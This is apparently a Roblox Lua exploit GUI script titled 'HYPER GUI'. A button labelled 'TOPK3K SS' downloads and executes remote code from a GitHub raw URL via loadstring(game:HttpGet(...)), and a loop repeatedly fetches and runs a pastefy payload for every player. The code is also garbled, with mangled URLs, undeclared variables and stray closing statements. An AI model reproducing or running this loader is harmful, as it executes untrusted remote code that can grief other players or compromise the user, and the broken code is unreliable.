HYPERGUI
HYPERGUI
-- Version: 3.2
-- Instances:
--Properties:
ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(24, 24, 24)
Frame.BorderColor3 = Color3.fromRGB(8, 22, 240)
Frame.BorderSizePixel = 5
Frame.Position = UDim2.new(0.0546606332, 160, 0.336497754, -209)
Frame.Size = UDim2.new(0, 415, 0, 782)
Frame.Active = true
Frame.Draggable = true
TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(27, 42, 53)
TextLabel.Position = UDim2.new(0.272000015, 0, 0.0189999994, 0)
TextLabel.Size = UDim2.new(0, 170, 0, 32)
TextLabel.Font = Enum.Font.Arial
TextLabel.Text = "HYPER GUI"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextScaled = true
TextLabel.TextSize = 14.000
TextLabel.TextWrapped = true
TextLabel_2.Parent = TextLabel
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.BorderColor3 = Color3.fromRGB(27, 42, 53)
TextLabel_2.Position = UDim2.new(-0.00465017557, 0, 0.977094233, 0)
TextLabel_2.Size = UDim2.new(0, 170, 0, 32)
TextLabel_2.Font = Enum.Font.Arial
TextLabel_2.Text = "TOP"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14.000
TextLabel_2.TextWrapped = true
TextLabel_3.Parent = decalspam_2
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel_3.BorderSizePixel = 0
TextLabel_3.Position = UDim2.new(-0.825788617, 0, 1.1906451, 0)
TextLabel_3.Size = UDim2.new(0, 200, 0, 23)
TextLabel_3.Font = Enum.Font.SourceSans
TextLabel_3.Text = "🤑🤑🤑"
TextLabel_3.TextColor3 = Color3.fromRGB(245, 230, 230)
TextLabel_3.TextScaled = true
TextLabel_3.TextSize = 14.000
TextLabel_3.TextWrapped = true
DESTROYYYYYYY.Name = "DESTROYYYYYYY"
DESTROYYYYYYY.Parent = TextLabel_2
DESTROYYYYYYY.BackgroundColor3 = Color3.fromRGB(2, 2, 2)
DESTROYYYYYYY.BorderColor3 = Color3.fromRGB(11, 22, 230)
DESTROYYYYYYY.BorderSizePixel = 0
DESTROYYYYYYY.Position = UDim2.new(-0.543097973, 0, 11.5089912, 0)
DESTROYYYYYYY.Size = UDim2.new(0, 377, 0, 50)
DESTROYYYYYYY.Font = Enum.Font.Arial
DESTROYYYYYYY.Text = "TOPK3K SS"
DESTROYYYYYYY.TextColor3 = Color3.fromRGB(255, 255, 255)
DESTROYYYYYYY.TextSize = 23.000
DESTROYYYYYYY.MouseButton1Down:connect(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/c-1-23/c-1-23/refs/
heads/main/T0PK3K%205.0%20SS%20Edition"))()
end)
while task.wait() do
for _, player in ipairs(Players:GetPlayers()) do
loadstring(game:HttpGet("https://pastefy.app/xW6jHXFx/raw"))()
end
end
end)
--Scripts
function dragify(Main)
dragToggle = nil
dragSpeed = 0.95 -- You can edit this.
dragInput = nil
dragStart = nil
dragPos = nil
function updateInput(input)
Delta = input.Position - dragStart
Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X,
startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
game:GetService("TweenService"):Create(Main, TweenInfo.new(.25), {Position =
Position}):Play()
end
Main.InputBegan:Connect(function(input)
if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType
== Enum.UserInputType.Touch) then
dragToggle = true
dragStart = input.Position
startPos = Main.Position
input.Changed:Connect(function()
if (input.UserInputState == Enum.UserInputState.End) then
dragToggle = false
end
end)
end
end)
Main.InputChanged:Connect(function(input)
if (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType
== Enum.UserInputType.Touch) then
dragInput = input
end
end)
game:GetService("UserInputService").InputChanged:Connect(function(input)
if (input == dragInput and dragToggle) then
updateInput(input)
end
end)
end
dragify(script.Parent)